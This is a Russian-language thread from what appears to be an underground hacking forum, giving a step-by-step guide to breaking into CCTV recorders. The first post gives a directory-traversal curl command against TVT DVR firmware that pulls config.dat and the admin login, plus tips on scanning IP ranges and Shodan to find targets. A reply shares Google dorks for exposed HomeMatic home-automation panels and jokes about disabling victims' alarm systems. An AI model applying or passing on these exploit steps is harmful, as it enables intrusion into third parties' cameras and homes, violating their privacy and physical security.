Скрыть объявление
Для безопасных сделок с продавцами рекомендуем пользоваться Гарант сервисом

Взлом и получение доступа к камерам наблюдения.

Тема в разделе "Безопасность при работе в интернете", создана пользователем Marlb0r0, 3/3/16.

  1. Marlb0r0

    Marlb0r0 dark-service.xyz
    VIP Внесен депозит 200$

    Сообщения:
    2.838
    Симпатии:
    541
    Всем привет, хочу донести до Вас информацию, может и есть в открытом доступе но она не расписана и не разжёванная. Сейчас очень много приходит информации о взломанных камерах наблюдениях, в банках, в учреждениях, даже на Украине на донбасе в последние время начали в мелькать подобные сообщения.

    [​IMG]


    Информация

    Для начала, посмотрим на саму уязвимость, она была виставлена на Exploit-DB с тайтлом «TVT TD-2308SS-B DVR directory traversal», — регистратор на 16 камер + 2 выхода на аудио, на котором стоит прошивка 3.2.0.P-3520A-00, и другие устройства с этой прошивкой. Атакующий может получить доступ к файлам конфигурации, таких как config.dat, где находится инфа для входа в веб интерфейс.

    Адрес где лежит конфигурационный файл.

    http://[IP ADDRESS]/../../../mnt/mtd/config/config.dat
    1
    http://[IP ADDRESS]/../../../mnt/mtd/config/config.dat
    Парсинг

    Именно для меня на данный момент такой способ парсинга самый актуальный.
    Использую я Advanced IP Scanner — линк на офф линк на офф

    Сам сканер. Выбран диапазон IP. Нас интересует шапка DVR Components Download

    [​IMG]

    Вот такой вид имеет панель входа.

    [​IMG]

    Вот код самого експлойта

    curl http://[IP Address]/../../../mnt/mtd/config/config.dat 2>/dev/null | strings
    1
    curl http://[IP Address]/../../../mnt/mtd/config/config.dat 2>/dev/null | strings
    Вот пример

    [​IMG]

    Ну и все в итоге у нас юзер и пасс от панели

    [​IMG]

    Maybe End

    Все очень и очень просто.
    Есть еще поисковик Shodan через который тоже можно искать камеры.
     
  2. Rinua

    Rinua Очень активный ползователь

    Сообщения:
    242
    Симпатии:
    0
    щас наверное школота будет базы камер собирать и будут продавать
     
  3. PeCHEneG

    PeCHEneG dark-service.xyz
    VIP Внесен депозит 2500$ Проверенный продавец

    Сообщения:
    2.221
    Симпатии:
    463
    , меня конечно больше заинтересовал эксплоит системы домашней автоматики, опубликованный все там же.
    Можно запросто добавить температуру у буржуинов дома, или поиграться со светом, или с жалюзи.
    Но самое интересное что можно запросто отключить систему безопасности :)
    Выкладывать тут не буду, а то бедным буржуинам не будет жизни от российских школьников.
    А нет наверное все таки сделаю гадость:
    https://www.exploit-db.com/ghdb/4199/
    А это совсем для ленивых сразу поиск в Google по эксплоиту:
    https://www.google.ru/search?q=intitle:"homematic+webui"&gws_rd=cr,ssl&ei=hKPYVpnGDciU6ASEsZywCA
    Если нашли что то типа HomeMatic WebUI можно заходить и играться

    Ну и вот еще одно из последнего
    https://www.exploit-db.com/ghdb/4205/
    Поиск в Google
    https://www.google.ru/search?q=inur...:user&gws_rd=cr,ssl&ei=TaTYVrXxAavm6ATNiLfQDw
    Ну тут сами разберетесь.
     
  4. Marlb0r0

    Marlb0r0 dark-service.xyz
    VIP Внесен депозит 200$

    Сообщения:
    2.838
    Симпатии:
    541
    , Ну все, пиши пропало. Ты теперь после Барака второй человек кого будут так не любить)
     

Поделиться этой страницей